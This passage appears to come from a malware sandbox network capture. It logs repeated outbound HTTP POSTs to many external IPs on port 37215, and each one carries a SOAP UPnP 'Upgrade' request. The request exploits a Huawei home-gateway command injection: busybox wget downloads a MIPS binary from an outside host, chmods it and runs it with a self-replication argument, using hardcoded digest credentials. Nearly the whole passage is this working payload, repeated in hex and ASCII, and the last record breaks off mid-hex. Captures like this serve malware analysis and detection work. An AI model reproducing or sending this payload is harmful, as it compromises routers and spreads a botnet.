                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          872192.168.2.156051641.154.67.9537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.665942907 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          873192.168.2.153667889.49.179.19337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.687499046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          874192.168.2.1533466157.75.140.13437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.687530994 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          875192.168.2.1545942157.15.223.24437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.687556982 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          876192.168.2.155842441.3.107.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.687602997 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          877192.168.2.1552046197.159.157.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.687643051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          878192.168.2.153338445.23.20.20437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.687669039 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          879192.168.2.1543624174.208.168.4137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.687711954 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          880192.168.2.155525041.229.238.15737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.687741041 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          881192.168.2.1546224157.204.10.4237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.687772036 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 